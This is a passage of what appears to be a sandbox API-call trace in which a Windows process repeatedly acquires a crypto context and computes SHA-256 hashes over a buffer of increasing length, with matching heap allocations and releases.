	[0153.511] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.511] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.511] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0153.511] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.511] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305988
	[0153.511] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305988, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305988, pdwDataLen=0x128aac) returned 1
	[0153.511] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.511] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.511] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.511] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.511] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0153.511] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.512] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23059b0
	[0153.512] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23059b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23059b0, pdwDataLen=0x128aac) returned 1
	[0153.512] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.512] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.512] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.512] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.512] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0153.512] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.512] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23059d8
	[0153.512] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23059d8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23059d8, pdwDataLen=0x128aac) returned 1
	[0153.512] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.512] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.512] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.513] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.513] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0153.513] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.513] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305a00
	[0153.513] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305a00, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305a00, pdwDataLen=0x128aac) returned 1
	[0153.513] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.513] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.513] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.513] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.513] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0153.513] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.513] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305a28
	[0153.513] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305a28, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305a28, pdwDataLen=0x128aac) returned 1
	[0153.513] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.513] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.513] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.514] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.514] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0153.514] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.514] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305a50
	[0153.514] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305a50, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305a50, pdwDataLen=0x128aac) returned 1
	[0153.514] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.514] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.514] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.514] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.514] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0153.514] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.514] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305a78
	[0153.514] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305a78, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305a78, pdwDataLen=0x128aac) returned 1
	[0153.514] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.514] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.514] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.515] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.515] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0153.515] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.515] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305aa0
	[0153.515] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305aa0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305aa0, pdwDataLen=0x128aac) returned 1
	[0153.515] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.515] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.515] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.515] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.515] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0153.515] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.515] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305ac8
	[0153.515] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305ac8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305ac8, pdwDataLen=0x128aac) returned 1
	[0153.515] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.515] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.515] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.516] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.516] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0153.516] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.516] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305af0
	[0153.516] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305af0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305af0, pdwDataLen=0x128aac) returned 1
	[0153.516] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.516] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.516] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.517] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.517] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0153.517] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.517] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305b18
	[0153.517] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305b18, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305b18, pdwDataLen=0x128aac) returned 1
	[0153.517] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.517] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.517] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.517] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.517] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0153.517] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.517] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305b40
	[0153.517] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305b40, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305b40, pdwDataLen=0x128aac) returned 1
	[0153.517] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.517] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.517] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.518] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.518] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0153.518] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.518] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305b68
	[0153.518] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305b68, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305b68, pdwDataLen=0x128aac) returned 1
	[0153.518] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.518] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.518] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.518] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.518] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0153.518] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.518] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305b90
	[0153.518] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305b90, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305b90, pdwDataLen=0x128aac) returned 1
	[0153.518] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.519] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.519] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.519] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.519] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0153.519] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.519] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305bb8
	[0153.519] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305bb8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305bb8, pdwDataLen=0x128aac) returned 1
	[0153.519] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.519] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.519] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.519] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.520] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0153.520] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.520] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305be0
	[0153.520] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305be0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305be0, pdwDataLen=0x128aac) returned 1
	[0153.520] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.520] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.520] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.520] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.520] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0153.520] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.520] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305c08
	[0153.520] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305c08, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305c08, pdwDataLen=0x128aac) returned 1
	[0153.520] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.520] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.520] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.521] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.521] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0153.521] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.521] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305c30
	[0153.521] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305c30, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305c30, pdwDataLen=0x128aac) returned 1
	[0153.521] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.521] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.521] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.521] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.521] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0153.521] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.521] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305c58
	[0153.521] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305c58, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305c58, pdwDataLen=0x128aac) returned 1
	[0153.521] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.521] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.522] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.522] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.522] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0153.522] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.522] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305c80
	[0153.522] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305c80, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305c80, pdwDataLen=0x128aac) returned 1
	[0153.522] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.522] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.522] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.523] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.523] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0153.523] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.523] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305ca8
	[0153.523] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305ca8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305ca8, pdwDataLen=0x128aac) returned 1
	[0153.523] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.523] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.523] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.523] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.523] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0153.523] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.523] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305cd0
	[0153.523] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305cd0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305cd0, pdwDataLen=0x128aac) returned 1
	[0153.523] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.523] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.523] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.524] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.524] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0153.524] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.524] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305cf8
	[0153.524] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305cf8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305cf8, pdwDataLen=0x128aac) returned 1
	[0153.524] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.524] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.524] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.524] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.524] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0153.524] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.524] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305d20
	[0153.524] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305d20, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305d20, pdwDataLen=0x128aac) returned 1
	[0153.524] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.524] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.524] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.525] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.525] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0153.525] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.525] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305d48
	[0153.525] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305d48, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305d48, pdwDataLen=0x128aac) returned 1
	[0153.525] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.525] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.525] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.525] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
